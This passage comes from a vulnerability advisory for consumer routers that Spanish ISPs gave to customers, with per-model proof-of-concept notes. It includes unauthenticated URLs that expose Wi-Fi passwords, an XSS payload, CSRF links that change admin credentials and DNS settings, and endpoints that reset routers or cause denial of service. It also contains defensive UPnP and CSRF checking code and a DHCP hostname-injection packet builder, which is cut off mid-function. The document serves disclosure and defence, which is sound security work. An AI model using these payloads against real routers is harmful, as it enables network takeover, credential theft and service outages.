(AddPortMapping) or terminating any WAN connection (ForceTermination).
These actions allow an attacker to carry out a persistent denial of service (the router
needs to be factory reset to work properly again) or to open critical ports, even for
remote hosts which are not in the LAN.
It is also possible for an attacker to change the WPS configuration settings, reset the AP
to its default settings and obtain critical information, such as WLAN passwords.
============================================================================================
============================================================================================
Manufacturer: Observa Telecom
Model: Home Station BHS-RTA
Tested firmwares: v1.1.3
Comments: Common router that Spanish ISP Telefónica used to give away to their ADSL/VDSL
customers
--------------------------------------------------------------------------------------------
--------------------------------- Information Disclosure ---------------------------------
* Description: The Observa Telecom Home Station BHS-RTA web interface allows an external
attacker to obtain critical information without any login process.
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignment.
OSVDB-121781 (http://osvdb.org/show/osvdb/121781),
OSVDB-121782 (http://osvdb.org/show/osvdb/121782),
OSVDB-121783 (http://osvdb.org/show/osvdb/121783) and
OSVDB-121784 (http://osvdb.org/show/osvdb/121784)
* PoC:
Without requiring any login process, an external attacker is able to obtain critical
information such as the WLAN password and settings, the Internet configuration, a list of
connected clients, etc.
By accessing the following URL, the browser shows the WLAN configuration, including the
passwords:
http://192.168.1.1/cgi-bin/webproc?getpage=html/gui/APIS/returnWifiJSON.txt&var:page=returnWifiJSON.txt&_=1430086147101
By accessing the following URL, the browser shows a list of connected clients, including
their IP and MAC addresses:
http://192.168.1.1/cgi-bin/webproc?getpage=html/gui/APIS/returnDevicesJSON.txt&var:page=returnDevicesJSON.txt&_=1430086147101
By accessing the following URL, the browser shows the Internet configuration parameters:
http://192.168.1.1/cgi-bin/webproc?getpage=html/gui/APIS/returnInternetJSON.txt&var:page=returnInternetJSON.txt&_=1430086980134
By accessing the following URL, the browser shows whether the administrator password has
been changed or is still the default one:
http://192.168.1.1/cgi-bin/webproc?getpage=html/gui/APIS/returnPasswordJSON.txt&var:page=returnPasswordJSON.txt&_=1430086980134
--------------------------------------------------------------------------------------------
-------------------------------- Universal Plug and Play ---------------------------------
* Description: An unauthenticated attacker is able to modify firewall rules and carry out
a persistent denial of service by using the supported Universal Plug and Play protocol.
* Report status: Reported to MITRE on 2015-05-21. Waiting for assignment.
OSVDB-122386 (http://osvdb.org/show/osvdb/122386)
* PoC:
The Universal Plug and Play (UPnP) protocol is supported by the device. This protocol has
many weaknesses, such as the lack of an authentication process, which can be exploited by
attackers.
The device supports multiple UPnP actions, such as changing the firewall rules
(AddPortMapping) or terminating any WAN connection (ForceTermination).
These actions allow an attacker to carry out a persistent denial of service (the router
needs to be factory reset to work properly again) or to open critical ports, even for
remote hosts which are not in the LAN.
============================================================================================
============================================================================================
Manufacturer: Observa Telecom
Model: VH4032N
Tested firmwares: VH4032N_V0.2.35
Comments: Common router that ISP Vodafone used to give away to their customers
--------------------------------------------------------------------------------------------
----------------------------- Persistent Cross Site Scripting ----------------------------
* Description: Some input fields within the router website are vulnerable to Cross-site
Scripting (XSS) attacks, allowing an attacker to execute malicious code.
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignment.
OSVDB-121793 (http://osvdb.org/show/osvdb/121793)
* PoC:
The threat is found in some input fields that allow special characters to be entered and
then display the entered data in the web interface itself.
E.g., the SSID input field is vulnerable if the following code is entered:
'; </script><script>alert(1)</script><script>//
The malicious code will be executed throughout the whole web interface.
--------------------------------------------------------------------------------------------
------------------------------- Cross Site Request Forgery -------------------------------
* Description: Every input field is vulnerable to Cross Site Request Forgery (CSRF)
attacks.
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignment.
OSVDB-121791 (http://osvdb.org/show/osvdb/121791) and
OSVDB-121792 (http://osvdb.org/show/osvdb/121792)
* PoC:
Despite the existence of a token tied to the session ID, configuration settings can be
modified without it. Thus, every input field is vulnerable to CSRF attacks.
E.g., if an attacker wants to change the administrator password, he may use the following
URL to do so once the victim opens the link:
http://192.168.0.1/en_US/administration.cgi?usrPassword=newpass
If an attacker wants to change the FTP server configuration settings, such as the password
and whether remote FTP connections from the WAN are allowed, he may use the following link:
http://192.168.0.1/en_US/config_ftp.cgi?ftpEnabled=1&ftpUserName=vodafone&ftpPassword=vulnpass&ftpPort=21&ftpAclMode=2
--------------------------------------------------------------------------------------------
------------------------ Bypass Authentication using SMB Symlinks ------------------------
* Description: An external attacker, without requiring any login process, is able to
download the whole router kernel filesystem, including all the configuration information
and the user account information files, by creating symbolic links through the router
Samba server.
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignment.
OSVDB-121790 (http://osvdb.org/show/osvdb/121790)
* PoC:
An unauthenticated attacker is able to download the whole router filesystem by connecting
to the Samba server.
There is a shared service (called storage) in which it is possible to create symbolic
links to the router filesystem and download the content. E.g., a symlink to / is possible
and allows the attacker to freely view and download the entire filesystem.
--------------------------------------------------------------------------------------------
---------------------------- USB Device Bypass Authentication ----------------------------
* Description: An external attacker, without requiring any login process, is able to view,
modify, delete and upload new files to the USB storage device connected to the router.
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignment.
OSVDB-121794 (http://osvdb.org/show/osvdb/121794)
* PoC:
If a USB storage device is hooked up to the router, an external attacker is able to
download files, modify their content and upload new files, without requiring any login
process.
In order to do so, the attacker only needs to access the router IP on port 9000.
--------------------------------------------------------------------------------------------
-------------------------------- Universal Plug and Play ---------------------------------
* Description: An unauthenticated attacker is able to modify the WPS configuration by
using the supported Universal Plug and Play protocol.
* Report status: Reported to MITRE on 2015-05-21. Waiting for assignment.
OSVDB-122386 (http://osvdb.org/show/osvdb/122386)
* PoC:
The Universal Plug and Play (UPnP) protocol is enabled by default on the device. This
protocol has many weaknesses, such as the lack of an authentication process, which can be
exploited by attackers.
The device supports multiple UPnP actions, such as changing the WPS configuration or
resetting the AP to default settings.
============================================================================================
============================================================================================
Manufacturer: Huawei
Model: HG553
Tested firmwares: V100R001C03B043SP01
Comments: Common router that ISP Vodafone used to give away to their customers
--------------------------------------------------------------------------------------------
---------------------------- USB Device Bypass Authentication ----------------------------
* Description: An external attacker, without requiring any login process, is able to view,
modify, delete and upload new files to the USB storage device connected to the router.
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignment.
OSVDB-121778 (http://osvdb.org/show/osvdb/121778)
* PoC:
If a USB storage device is hooked up to the router, an external attacker is able to
download files, modify their content and upload new files, without requiring any login
process.
In order to do so, the attacker only needs to access the router IP on port 9000.
--------------------------------------------------------------------------------------------
--------------------------------- Bypass Authentication ----------------------------------
* Description: An external attacker, without requiring any login process, is able to
reset the router settings to the default ones and to cause a permanent denial of service.
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignment.
OSVDB-121779 (http://osvdb.org/show/osvdb/121779)
* PoC:
Without requiring any login process, an attacker is able to cause a permanent denial of
service by constantly accessing the /rebootinfo.cgi URL.
The attacker is also able to force the router to reset to its default configuration
settings by accessing the /restoreinfo.cgi URL. After that, the attacker is able to log
into the router using the default credentials.
In both attacks, the router replies with an HTTP 400 status code, but the reboot or the
configuration reset is nevertheless executed.
--------------------------------------------------------------------------------------------
----------------------------- Persistent Cross Site Scripting ----------------------------
* Description: Some input fields within the router website are vulnerable to Cross-site
Scripting (XSS) attacks, allowing an attacker to execute malicious code.
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignment.
OSVDB-121776 (http://osvdb.org/show/osvdb/121776)
* PoC:
Although most of the input fields do not allow special characters to be entered, there are
still some in which an XSS can be performed.
E.g., the SSID field within the WiFi->Básico (WiFi->Basic) subdirectory allows script code
injection.
--------------------------------------------------------------------------------------------
------------------------------- Cross Site Request Forgery -------------------------------
* Description: Multiple Cross Site Request Forgery (CSRF) vulnerabilities within the
router website allow an external attacker to carry out actions such as changing the
administrator password.
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignment.
OSVDB-121775 (http://osvdb.org/show/osvdb/121775)
* PoC:
Every input field is vulnerable to Cross Site Request Forgery attacks.
E.g., if an attacker wants to change the administrator password, he may use the following
URL to do so once the victim opens the link:
http://192.168.0.1/userpasswd.cgi?usrPassword=newpassword
--------------------------------------------------------------------------------------------
-------------------------------- Universal Plug and Play ---------------------------------
* Description: An unauthenticated attacker is able to modify firewall rules and carry out
a persistent denial of service by using the supported Universal Plug and Play protocol.
* Report status: Reported to MITRE on 2015-05-21. Waiting for assignment.
OSVDB-122385 (http://osvdb.org/show/osvdb/122385)
* PoC:
The Universal Plug and Play (UPnP) protocol is enabled by default on the device. This
protocol has many weaknesses, such as the lack of an authentication process, which can be
exploited by attackers.
The device supports multiple UPnP actions, such as changing the firewall rules
(AddPortMapping) or terminating any WAN connection (ForceTermination).
These actions allow an attacker to carry out a persistent denial of service (the router
needs to be factory reset to work properly again) or to open critical ports, even for
remote hosts which are not in the LAN.
============================================================================================
============================================================================================
Manufacturer: Huawei
Model: HG556a
Tested firmwares: V100R001C10B077
Comments: Common router that ISP Vodafone used to give away to their customers
--------------------------------------------------------------------------------------------
---------------------------- USB Device Bypass Authentication ----------------------------
* Description: An external attacker, without requiring any login process, is able to view,
modify, delete and upload new files to the USB storage device connected to the router.
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignment.
OSVDB-121778 (http://osvdb.org/show/osvdb/121778)
* PoC:
If a USB storage device is hooked up to the router, an external attacker is able to
download files, modify their content and upload new files, without requiring any login
process.
In order to do so, the attacker only needs to access the router IP on port 9000.
--------------------------------------------------------------------------------------------
--------------------------------- Bypass Authentication ----------------------------------
* Description: An external attacker, without requiring any login process, is able to
reset the router settings to the default ones and to cause a permanent denial of service.
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignment.
OSVDB-121779 (http://osvdb.org/show/osvdb/121779)
* PoC:
Without requiring any login process, an attacker is able to cause a permanent denial of
service by constantly accessing the /rebootinfo.cgi URL.
The attacker is also able to force the router to reset to its default configuration
settings by accessing the /restoreinfo.cgi URL. After that, the attacker is able to log
into the router using the default credentials.
In both attacks, the router asks for a username and password and returns an HTTP 401
(Unauthorized) status code, but after multiple requests are sent it replies with an HTTP
400 status code and executes the action.
--------------------------------------------------------------------------------------------
------------------------------- Cross Site Request Forgery -------------------------------
* Description: Multiple Cross Site Request Forgery (CSRF) vulnerabilities within the
router website allow an external attacker to carry out actions such as changing the
administrator password.
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignment.
OSVDB-121775 (http://osvdb.org/show/osvdb/121775)
* PoC:
Every input field is vulnerable to Cross Site Request Forgery attacks.
E.g., if an attacker wants to change the administrator password, he may use the following
URL to do so once the victim opens the link:
http://192.168.1.23/es_ES/expert/userpasswd.cgi?usrPassword=vodafone1&sSuccessPage=administration.htm&sErrorPage=administration.htm
--------------------------------------------------------------------------------------------
----------------------------- Persistent Cross Site Scripting ----------------------------
* Description: Some input fields within the router website are vulnerable to Cross-site
Scripting (XSS) attacks, allowing an attacker to execute malicious code.
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignment.
OSVDB-121776 (http://osvdb.org/show/osvdb/121776)
* PoC:
Although most of the input fields do not allow special characters to be entered, there are
still some in which an XSS can be performed.
E.g., the SSID field within the WiFi->Nombre (WiFi->Name) subdirectory allows script code
injection.
The script execution can be clearly seen within different subdirectories such as
diagnostic.htm and config_wifi.htm.
--------------------------------------------------------------------------------------------
-------------------------- Unauthenticated Cross Site Scripting --------------------------
* Description: Unauthenticated Cross-site Scripting (XSS) allows an attacker to inject
malicious code into the router configuration website by sending a DHCP Request PDU.
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignment.
OSVDB-121777 (http://osvdb.org/show/osvdb/121777)
* PoC:
An external attacker is able to inject malicious code into the router website without
requiring any login process.
This is achieved by sending a DHCP Request PDU containing the malicious script within the
hostname parameter.
The malicious code will be stored within the Dispositivos Conectados (Connected Devices)
table.
Once the victim views this list, the script is executed.
--------------------------------------------------------------------------------------------
-------------------------------- Universal Plug and Play ---------------------------------
* Description: An unauthenticated attacker is able to modify firewall rules and carry out
a persistent denial of service by using the supported Universal Plug and Play protocol.
* Report status: Reported to MITRE on 2015-05-21. Waiting for assignment.
OSVDB-122385 (http://osvdb.org/show/osvdb/122385)
* PoC:
The Universal Plug and Play (UPnP) protocol is enabled by default on the device. This
protocol has many weaknesses, such as the lack of an authentication process, which can be
exploited by attackers.
The device supports multiple UPnP actions, such as changing the firewall rules
(AddPortMapping) or terminating any WAN connection (ForceTermination).
These actions allow an attacker to carry out a persistent denial of service (the router
needs to be factory reset to work properly again) or to open critical ports, even for
remote hosts which are not in the LAN.
============================================================================================
============================================================================================
Manufacturer: Astoria
Model: ARV7510
Tested firmwares: 00.03.41
Comments: Common router that ISP Vodafone used to give away to their customers
--------------------------------------------------------------------------------------------
---------------------------- USB Device Bypass Authentication ----------------------------
* Description: An external attacker, without requiring any login process, is able to view,
modify, delete and upload new files to the USB storage device connected to the router.
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignment.
OSVDB-121773 (http://osvdb.org/show/osvdb/121773)
* PoC:
If a USB storage device is hooked up to the router, an external attacker is able to
download files, modify their content and upload new files, without requiring any login
process.
In order to do so, the attacker only needs to access the router IP on port 9000.
--------------------------------------------------------------------------------------------
------------------------------- Cross Site Request Forgery -------------------------------
* Description: Multiple Cross Site Request Forgery (CSRF) vulnerabilities within the
router website allow an external attacker to carry out actions such as changing the
administrator password.
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignment.
OSVDB-121774 (http://osvdb.org/show/osvdb/121774) and
OSVDB-121888 (http://osvdb.org/show/osvdb/121888)
* PoC:
Every input field is vulnerable to Cross Site Request Forgery attacks.
E.g., if an attacker wants to change the administrator password, he may use the following
URL to do so once the victim opens the link:
http://192.168.1.22/cgi-bin/setup_pass.cgi?pwdOld=vodafone&pwdNew=vodafone1&pwdCfm=vodafone1
============================================================================================
============================================================================================
Manufacturer: Amper
Model: ASL-26555
Tested firmwares: v2.0.0.37B_ES
Comments: Common router that Spanish ISP Telefónica used to give away to their customers
--------------------------------------------------------------------------------------------
------------------------------- Cross Site Request Forgery -------------------------------
* Description: Multiple Cross Site Request Forgery (CSRF) vulnerabilities within the
router website allow an external attacker to carry out actions such as changing the
administrator password.
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignment.
OSVDB-121770 (http://osvdb.org/show/osvdb/121770) and
OSVDB-121771 (http://osvdb.org/show/osvdb/121771)
* PoC:
Besides the main web configuration interface (port 80), there is a much more advanced one
on port 8000 in which every input field is vulnerable to CSRF.
E.g., if an attacker wants to change the DNS servers, he may use the following URL to do
so once the victim opens the link:
http://192.168.1.21:8000/ADVANCED/ad_dns.xgi?&set/dproxy/enable=0&set/dns/mode=4&set/dns/server/primarydns=80.58.61.251&set/dns/server/secondarydns=80.58.61.251&CMT=0&EXE=DNS
It is also possible for an attacker to change the default router administrator password by
sending the victim this URL: (URL is omitted due to size reasons)
--------------------------------------------------------------------------------------------
----------------------------- Persistent Cross Site Scripting ----------------------------
* Description: Some input fields within the router website are vulnerable to Cross-site
Scripting (XSS) attacks, allowing an attacker to execute malicious code.
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignment.
OSVDB-121772 (http://osvdb.org/show/osvdb/121772)
* PoC:
Although most of the input fields do not allow special characters to be entered, there are
still some in which an XSS can be performed.
E.g., the SSID field within the Red Inalambrica->Nombre (Wireless Network->Name)
subdirectory allows script code injection. The vulnerable input field is found in the
basic web interface on port 80.
The script execution can be clearly seen within the Advanced->WLAN Access Rules
subdirectory, in the advanced web interface on port 8000.
--------------------------------------------------------------------------------------------
-------------------------- Unauthenticated Cross Site Scripting --------------------------
* Description: Unauthenticated Cross-site Scripting (XSS) allows an attacker to inject
malicious code into the router configuration website by sending a DHCP Request PDU.
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignment.
OSVDB-121224 (http://osvdb.org/show/osvdb/121224)
* PoC:
An external attacker is able to inject malicious code into the router website without
requiring any login process.
This is achieved by sending a DHCP Request PDU containing the malicious script within the
hostname parameter.
The malicious code will be stored within the Connected Clients table (Setup->Local
Network).
Once the victim views this list, the script is executed.
--------------------------------------------------------------------------------------------
-------------------------------- Universal Plug and Play ---------------------------------
* Description: An unauthenticated attacker is able to modify firewall rules and carry out
a persistent denial of service by using the supported Universal Plug and Play protocol.
* Report status: Reported to MITRE on 2015-05-21. Waiting for assignment.
OSVDB-122388 (http://osvdb.org/show/osvdb/122388)
* PoC:
The Universal Plug and Play (UPnP) protocol is supported by the device. This protocol has
many weaknesses, such as the lack of an authentication process, which can be exploited by
attackers.
The device supports multiple UPnP actions, such as changing the firewall rules
(AddPortMapping) or terminating any WAN connection (ForceTermination).
These actions allow an attacker to carry out a persistent denial of service (the router
needs to be factory reset to work properly again) or to open critical ports, even for
remote hosts which are not in the LAN.
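The UPnP sections above (for every device that lists AddPortMapping and ForceTermination) describe the same unauthenticated control surface. As an added example, not code from the advisory or from any vendor, the following audits captured WANIPConnection SOAP control requests against the policy a defender would want the router (or a monitoring box on the LAN) to enforce; the LAN prefix and the administrative port list are assumptions, and the sample requests are constructed.

```python
"""Audit captured UPnP IGD control requests for the abuse described above.

Added example (not code from the advisory). A SOHO router's WANIPConnection
service accepts AddPortMapping and ForceTermination from any LAN host with
no authentication. This takes the SOAP body of a control request plus the
LAN address that sent it and reports the requests a defender should block
or alert on. The LAN prefix and the administrative port list are assumptions.
"""
import ipaddress
import xml.etree.ElementTree as ET
from dataclasses import dataclass

SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
LAN = ipaddress.ip_network("192.168.1.0/24")       # assumed router LAN
ADMIN_PORTS = {21, 22, 23, 80, 443, 445, 9000}     # never expose to the WAN


@dataclass
class Finding:
    action: str
    sender: str
    reasons: list


def parse_action(body: str):
    """Return (action name, {argument: value}) from a SOAP control body."""
    root = ET.fromstring(body)
    soap_body = root.find(f"{{{SOAP_NS}}}Body")
    if soap_body is None or len(soap_body) == 0:
        raise ValueError("SOAP Body missing or empty")
    call = soap_body[0]
    # Tags arrive as '{namespace}Name'; keep only the local name.
    action = call.tag.rsplit("}", 1)[-1]
    args = {c.tag.rsplit("}", 1)[-1]: (c.text or "").strip() for c in call}
    return action, args


def audit_request(sender_ip: str, body: str):
    """Return a Finding for a request that violates policy, else None."""
    action, args = parse_action(body)
    reasons = []
    if action == "ForceTermination":
        # Dropping the WAN link from the LAN is the persistent-DoS primitive
        # the advisory describes; no LAN client has a legitimate need for it.
        reasons.append("ForceTermination invoked without authentication")
    elif action == "AddPortMapping":
        internal = args.get("NewInternalClient", "")
        try:
            port = int(args.get("NewInternalPort") or 0)
        except ValueError:
            port = 0
        try:
            inside_lan = ipaddress.ip_address(internal) in LAN
        except ValueError:
            inside_lan = False
        if not inside_lan:
            reasons.append(f"internal client {internal!r} is outside the LAN")
        elif internal != sender_ip:
            reasons.append(f"port opened on {internal}, not on the requester")
        if port in ADMIN_PORTS:
            reasons.append(f"administrative port {port} exposed to the WAN")
    return Finding(action, sender_ip, reasons) if reasons else None


def _soap(action: str, **args) -> str:
    """Build a WANIPConnection control body (constructed sample input only)."""
    inner = "".join(f"<{k}>{v}</{k}>" for k, v in args.items())
    return (
        f'<s:Envelope xmlns:s="{SOAP_NS}"><s:Body>'
        f'<u:{action} xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1">'
        f"{inner}</u:{action}></s:Body></s:Envelope>"
    )


# Constructed samples: a normal peer-to-peer mapping, a mapping whose internal
# client is a host outside the LAN, a mapping that exposes the router's own
# telnet port, and a bare ForceTermination.
BENIGN = _soap("AddPortMapping", NewRemoteHost="", NewExternalPort=51413,
               NewProtocol="TCP", NewInternalPort=51413,
               NewInternalClient="192.168.1.10", NewEnabled=1,
               NewPortMappingDescription="p2p", NewLeaseDuration=3600)
OUTSIDE = _soap("AddPortMapping", NewRemoteHost="", NewExternalPort=8080,
                NewProtocol="TCP", NewInternalPort=80,
                NewInternalClient="203.0.113.5", NewEnabled=1,
                NewPortMappingDescription="x", NewLeaseDuration=0)
ROUTER_TELNET = _soap("AddPortMapping", NewRemoteHost="", NewExternalPort=2323,
                      NewProtocol="TCP", NewInternalPort=23,
                      NewInternalClient="192.168.1.1", NewEnabled=1,
                      NewPortMappingDescription="x", NewLeaseDuration=0)
TERMINATE = _soap("ForceTermination")

if __name__ == "__main__":
    for who, body in [("192.168.1.10", BENIGN), ("192.168.1.66", OUTSIDE),
                      ("192.168.1.66", ROUTER_TELNET), ("192.168.1.66", TERMINATE)]:
        print(who, audit_request(who, body))
```

The same policy can be applied by a firmware that keeps UPnP enabled: reject the request instead of merely logging the finding.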
============================================================================================
============================================================================================
Manufacturer: Comtrend
Model: AR-5387un
Tested firmwares: A731-410JAZ-C04_R02
Comments: Common router that ISP Jazztel used to give away to their customers
--------------------------------------------------------------------------------------------
----------------------------- Persistent Cross Site Scripting ----------------------------
* Description: Some input fields within the router website are vulnerable to Cross-site
Scripting (XSS) attacks, allowing an attacker to execute malicious code.
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignment.
OSVDB-121218 (http://osvdb.org/show/osvdb/121218)
* PoC:
Although most of the input fields do not allow special characters to be entered, there are
still some in which an XSS can be performed.
E.g., the SSID field within the Wireless->Basic subdirectory allows script code injection.
The script execution can be clearly seen within the Wireless->Security and Wireless->MAC
Filter subdirectories.
--------------------------------------------------------------------------------------------
-------------------------- Unauthenticated Cross Site Scripting --------------------------
* Description: Unauthenticated Cross-site Scripting (XSS) allows an attacker to inject
malicious code into the router configuration website by sending a DHCP Request PDU.
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignment.
OSVDB-121215 (http://osvdb.org/show/osvdb/121215)
* PoC:
An external attacker is able to inject malicious code into the router website without
requiring any login process.
This is achieved by sending a DHCP Request PDU containing the malicious script within the
hostname parameter.
The malicious code will be stored within the DHCP Leases table (Device Info -> DHCP).
Once the victim views this list, the script is executed.
============================================================================================
============================================================================================
Manufacturer: Netgear
Model: CG3100D
Tested firmwares: v1.05.05
Comments: Common router that ISP ONO used to give away to their customers
--------------------------------------------------------------------------------------------
------------------------------- Cross Site Request Forgery -------------------------------
* Description: Multiple Cross Site Request Forgery (CSRF) vulnerabilities within the
router website allow an external attacker to carry out actions such as changing the
administrator password.
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignment.
OSVDB-121795 (http://osvdb.org/show/osvdb/121795)
* PoC:
Every input field is vulnerable to CSRF.
An attacker may code a malicious website which triggers a POST request to the victim's
router. When a website with that code is accessed, the POST request is sent and the attack
is done.
It is also possible for an attacker to reset the victim's router to default settings by
using custom source code.
(Source codes have been omitted due to size reasons).
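The CSRF findings above (the password-change and reboot endpoints that act on a bare GET, and the VH4032N's session token that is present but not required) all come down to the same missing server-side check. As an added example, not code from the advisory or from any vendor, the following shows the check a router CGI should apply before any state change: POST only, same-origin Origin/Referer, and a per-session token that must match. Endpoint names are taken from the advisory; the router addresses, the request model and the sample requests are assumptions.

```python
"""Server-side CSRF check a router CGI should apply to state-changing requests.

Added example (not code from the advisory or any vendor). Three conditions
must hold before a state change is accepted: the request is a POST, its
Origin (or Referer) names the router itself, and it carries the token bound
to the caller's session. Endpoint names come from the advisory; the router
addresses and the request model are assumptions.
"""
import hmac
import secrets
from dataclasses import dataclass, field
from urllib.parse import urlsplit

ROUTER_HOSTS = {"192.168.0.1", "192.168.1.1"}     # assumed admin UI addresses
STATE_CHANGING = {"/userpasswd.cgi", "/config_ftp.cgi", "/form2Reboot.cgi"}


@dataclass
class Session:
    sid: str
    # Fresh random token per session; the UI embeds it in every form it serves.
    csrf_token: str = field(default_factory=lambda: secrets.token_hex(16))


@dataclass
class Request:
    method: str
    path: str
    headers: dict
    params: dict      # query string for GET, form body for POST


def csrf_check(req: Request, session: Session):
    """Return (allowed, reason). Only POST + same origin + matching token passes."""
    if req.path not in STATE_CHANGING:
        return True, "read-only endpoint"
    if req.method != "POST":
        # A GET is triggerable by any link or <img> the victim happens to load.
        return False, "state change requested via GET"
    origin = req.headers.get("Origin") or req.headers.get("Referer")
    if not origin:
        return False, "missing Origin and Referer"
    if urlsplit(origin).hostname not in ROUTER_HOSTS:
        return False, f"cross-site origin {origin}"
    token = req.params.get("csrf_token", "")
    # Constant-time compare on bytes; a missing token simply fails to match.
    if not hmac.compare_digest(token.encode(), session.csrf_token.encode()):
        return False, "csrf token missing or does not match the session"
    return True, "ok"


SESSION = Session(sid="constructed-session-id")

# Constructed requests: the forged link pattern from the advisory, a forged
# POST carrying the right token but a foreign origin (the origin check alone
# stops it), a same-origin POST with no token, and a legitimate POST.
FORGED_GET = Request("GET", "/userpasswd.cgi",
                     {"Referer": "http://attacker.example/page.html"},
                     {"usrPassword": "newpassword"})
FORGED_POST = Request("POST", "/userpasswd.cgi",
                      {"Origin": "http://attacker.example"},
                      {"usrPassword": "newpassword",
                       "csrf_token": SESSION.csrf_token})
NO_TOKEN = Request("POST", "/userpasswd.cgi", {"Origin": "http://192.168.0.1"},
                   {"usrPassword": "newpassword"})
LEGIT = Request("POST", "/userpasswd.cgi", {"Origin": "http://192.168.0.1"},
                {"usrPassword": "newpassword", "csrf_token": SESSION.csrf_token})

if __name__ == "__main__":
    for name, req in [("forged GET", FORGED_GET), ("forged POST", FORGED_POST),
                      ("no token", NO_TOKEN), ("legit", LEGIT)]:
        print(name, csrf_check(req, SESSION))
```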
--------------------------------------------------------------------------------------------
----------------------------- Persistent Cross Site Scripting ----------------------------
* Description: Some input fields within the router website are vulnerable to Cross-site
Scripting (XSS) attacks, allowing an attacker to execute malicious code.
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignment.
OSVDB-121780 (http://osvdb.org/show/osvdb/121780)
* PoC:
Although most of the input fields do not allow special characters to be entered, there are
still some in which an XSS can be performed.
E.g., the SSID field within the Red Inalambrica->Nombre (Wireless Network->Name)
subdirectory allows script code injection.
The script execution can be clearly seen within different subdirectories such as
Básico->Inicio (Basic->Home), Avanzado->Inicio (Advanced->Home) and Avanzado->Estado del
router (Advanced->Router status).
============================================================================================
============================================================================================
Manufacturer: Comtrend
Model: VG-8050
Tested firmwares: SB01-S412TLF-C07_R03
Comments: Common router that Spanish ISP Telefonica used to give away to their customers
--------------------------------------------------------------------------------------------
----------------------------- Persistent Cross Site Scripting ----------------------------
* Description: Some input fields within the router website are vulnerable to Cross-site
Scripting (XSS) attacks, allowing an attacker to execute malicious code.
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignment.
OSVDB-121218 (http://osvdb.org/show/osvdb/121218)
* PoC:
Although most of the input fields do not allow special characters to be entered, there are
still some in which an XSS can be performed.
E.g., the SSID field within the Wireless->Basic subdirectory allows script code injection.
The script execution can be clearly seen within the Wireless->Security and Wireless->MAC
Filter subdirectories.
--------------------------------------------------------------------------------------------
-------------------------- Unauthenticated Cross Site Scripting --------------------------
* Description: Unauthenticated Cross-site Scripting (XSS) allows an attacker on the local
network, without any login, to inject malicious code into the router configuration website
by sending a DHCP request whose Host Name option (option 12) carries the script.
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignment.
OSVDB-121215 (http://osvdb.org/show/osvdb/121215)
* PoC:
Any host on the LAN can inject code into the router website without going through any
login process: the router itself answers DHCP, and DHCP carries no authentication.
The attacker sends a DHCP request whose hostname option (option 12, Host Name) contains
the malicious script. The router stores the value, unencoded, in its DHCP Leases table
(Device Info -> DHCP).
Once the victim views that list, the script is executed in the victim's browser.
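The following Python script, added here as an example and not part of the original advisory, builds the DHCP request described above: a BOOTREQUEST/DHCPREQUEST whose option 12 (Host Name) carries the script. The MAC address, transaction id and payload are constructed for the example; what the router then does with the value is the advisory's claim, not something the script checks. Only send_request touches the network (it broadcasts from UDP 68 to 67 and needs privileges for that port); the builder and parser run offline.

```python
import socket
import struct

MAGIC_COOKIE = b"\x63\x82\x53\x63"            # RFC 2131 options magic cookie
OPT_MSG_TYPE, OPT_HOSTNAME, OPT_REQ_IP, OPT_END = 53, 12, 50, 255
DHCPREQUEST = 3

# Constructed for this example: a locally administered MAC and a plain test payload.
EXAMPLE_MAC = "02:00:00:00:00:01"
EXAMPLE_PAYLOAD = b"<script>alert(1)</script>"


def build_dhcp_request(mac, hostname, xid=0x1337BEEF, requested_ip=None):
    """Build a DHCPREQUEST whose Host Name option (12) carries `hostname` (bytes).

    Option 12 is a single TLV, so its value is limited to 255 bytes; longer values
    are refused rather than silently truncated.
    """
    if not 1 <= len(hostname) <= 255:
        raise ValueError("option 12 carries between 1 and 255 bytes")
    chaddr = bytes.fromhex(mac.replace(":", ""))
    if len(chaddr) != 6:
        raise ValueError("expected a 6-byte MAC address")
    # Fixed 236-byte BOOTP header: op=1 (BOOTREQUEST), htype=1 (Ethernet), hlen=6,
    # hops, xid, secs, flags (0x8000 = broadcast the reply), ciaddr, yiaddr, siaddr,
    # giaddr, then chaddr (16 bytes), sname (64) and file (128).
    header = struct.pack("!BBBBIHH4s4s4s4s", 1, 1, 6, 0, xid, 0, 0x8000,
                         b"\0" * 4, b"\0" * 4, b"\0" * 4, b"\0" * 4)
    header += chaddr.ljust(16, b"\0") + b"\0" * 64 + b"\0" * 128
    options = bytes([OPT_MSG_TYPE, 1, DHCPREQUEST])
    if requested_ip:
        options += bytes([OPT_REQ_IP, 4]) + socket.inet_aton(requested_ip)
    options += bytes([OPT_HOSTNAME, len(hostname)]) + hostname   # the injected value
    options += bytes([OPT_END])
    return header + MAGIC_COOKIE + options


def parse_options(packet):
    """Decode the option TLVs of a DHCP packet into {code: raw value}; this is the
    field a lease table takes its hostname column from."""
    if packet[236:240] != MAGIC_COOKIE:
        raise ValueError("not a DHCP packet (magic cookie missing)")
    opts, i = {}, 240
    while i < len(packet):
        code = packet[i]
        if code == OPT_END:
            break
        if code == 0:                      # pad byte, has no length field
            i += 1
            continue
        length = packet[i + 1]
        opts[code] = packet[i + 2:i + 2 + length]
        i += 2 + length
    return opts


def send_request(packet, bind_ip="0.0.0.0"):
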